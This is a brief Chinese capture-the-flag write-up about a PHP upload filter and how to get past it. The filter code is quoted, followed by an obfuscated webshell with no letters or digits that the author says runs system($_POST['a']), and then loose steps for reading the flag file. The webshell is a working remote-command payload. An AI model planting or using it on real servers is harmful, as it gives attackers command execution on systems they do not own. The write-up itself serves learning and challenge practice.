getshell writeup

参考连接https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ //这里面的$_FILES["file"]["tmp_name"]的意思是获取随机文件名，这一段的意思是打开（文件名）
    $data=substr($contents,5); //截断临时文件从第五为开始截断
    foreach ($black_char as $b) { //foreach是数组循环，这里面的$b就是数组里面的每个内容
        if (stripos($data, $b) !== false){ //如果waf在就会报错，而这里我们不知道waf是撒直接上传一个无字符上去
            die("illegal char");
        }
    }     
}
这道题的考点就是无字符的shell
上传的无字符webshell
<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);
这个翻译过来就是
system($_POST['a'])；
你直接post一个a= ../../../
就会看见一个flag文件
cat ../../../falg文件 即可
最后答案SUCTF{fake_flag_web_b}